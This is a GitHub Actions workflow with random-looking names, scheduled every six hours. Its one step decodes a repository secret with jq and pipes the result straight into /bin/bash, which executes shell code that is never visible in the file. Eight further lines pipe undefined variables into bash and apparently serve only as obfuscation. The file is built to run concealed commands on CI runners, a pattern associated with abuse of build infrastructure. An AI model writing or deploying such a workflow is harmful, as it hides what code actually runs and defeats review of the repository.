name: wupianyu6712
on:
  workflow_dispatch:
  schedule:
    - cron: '48 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wupianyu6712
        env:
          uxbqg4: ${{ secrets.uxbqg4 }}
        run: |
          echo $uxbqg4 | jq -r .sjol98569 | /bin/bash
          echo $omfxd38 | jq -r .s4 | /bin/bash
          echo $sdt81316 | jq -r .tpkj7 | /bin/bash
          echo $mzin60571 | jq -r .fkpu1 | /bin/bash
          echo $v012 | jq -r .bc736 | /bin/bash
          echo $a6 | jq -r .dst11 | /bin/bash
          echo $r11150 | jq -r .gqe7 | /bin/bash
          echo $jggc767 | jq -r .olewy58 | /bin/bash
          echo $wy81821 | jq -r .jbsfu89 | /bin/bash

